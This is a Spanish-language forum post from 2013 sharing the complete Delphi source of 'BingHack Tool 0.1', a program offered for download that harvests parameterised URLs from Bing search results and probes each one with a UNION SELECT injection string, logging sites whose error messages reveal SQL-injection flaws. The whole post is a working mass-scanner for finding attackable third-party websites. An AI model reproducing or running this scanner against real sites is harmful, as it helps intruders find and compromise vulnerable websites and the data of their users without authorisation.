[Delphi] BingHack Tool 0.1

Iniciado por BigBear, 31 Mayo 2013, 20:53 PM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Traduccion a delphi de este programa para buscar paginas vulnerables a SQLI usando bing.

Una imagen :



El codigo :

Código (delphi) [Seleccionar]

// BingHackTool 0.1
// Coded By Doddy H

unit bing;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sMemo, sSkinManager, PerlRegEx, IdBaseComponent,
  IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, sEdit, sLabel, sGroupBox,
  sListBox, ComCtrls, sStatusBar, ShellApi, jpeg, ExtCtrls;

type
  TForm1 = class(TForm)
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    sSkinManager1: TsSkinManager;
    PerlRegEx2: TPerlRegEx;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sEdit1: TsEdit;
    sLabel2: TsLabel;
    sEdit2: TsEdit;
    sGroupBox2: TsGroupBox;
    sListBox1: TsListBox;
    sGroupBox3: TsGroupBox;
    sListBox2: TsListBox;
    sStatusBar1: TsStatusBar;
    sGroupBox4: TsGroupBox;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    Image1: TImage;
    procedure sButton1Click(Sender: TObject);
    procedure sButton4Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure sButton2Click(Sender: TObject);
    procedure sListBox1DblClick(Sender: TObject);
    procedure sListBox2DblClick(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  Writeln(ar, texto);
  CloseFile(ar);

end;

procedure TForm1.FormCreate(Sender: TObject);
var
  dir: string;
begin

  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;

  dir := ExtractFilePath(Application.ExeName) + '/logs';

  if not(DirectoryExists(dir)) then
  begin
    CreateDir(dir);
  end;

  ChDir(dir);

end;

procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  chau: TStringList;
  target: string;

begin

  sListBox1.Items.Clear;

  target := StringReplace(sEdit1.text, ' ', '+', []);

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := 1 to StrToInt(sEdit2.text) do
  begin
    ii := i * 10;
    sListBox1.Update;
    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;

    code := IdHTTP1.Get('http://www.bing.com/search?q=' + target + '&first=' +
        IntToStr(ii));

    PerlRegEx1.Regex := '<h3><a href="(.*?)"';
    PerlRegEx1.Subject := code;

    while PerlRegEx1.MatchAgain do
    begin
      for z := 1 to PerlRegEx1.SubExpressionCount do
        link1 := PerlRegEx1.SubExpressions[z];

      PerlRegEx2.Regex := '(.*?)=(.*?)';
      PerlRegEx2.Subject := link1;

      if PerlRegEx2.Match then
      begin
        linkfinal := PerlRegEx2.SubExpressions[1] + '=';
        sListBox1.Items.Add(linkfinal);
      end;
    end;
  end;

  chau := TStringList.Create;

  chau.Duplicates := dupIgnore;
  chau.Sorted := True;
  chau.Assign(sListBox1.Items);
  sListBox1.Items.Clear;
  sListBox1.Items.Assign(chau);

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('bing-search.txt', sListBox1.Items[i]);
  end;

  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;

end;

procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;

begin

  sListBox2.Items.Clear;

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin

        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;
        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');

        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;

        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;

      end;
    except
      on E: EIdHttpProtocolException do
        ;
      on E: Exception do
        ;
    end;

    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;

  end;

end;

procedure TForm1.sButton3Click(Sender: TObject);
begin
  ShowMessage('Contact to lepuke[at]hotmail[com]');
end;

procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close();
end;

procedure TForm1.sListBox1DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'bing-search.txt', nil, nil, SW_SHOWNORMAL);
end;

procedure TForm1.sListBox2DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'sqli-founds.txt', nil, nil, SW_SHOWNORMAL);
end;

end.

// The End ?


Si quieren bajar el programa pueden hacerlo de aca.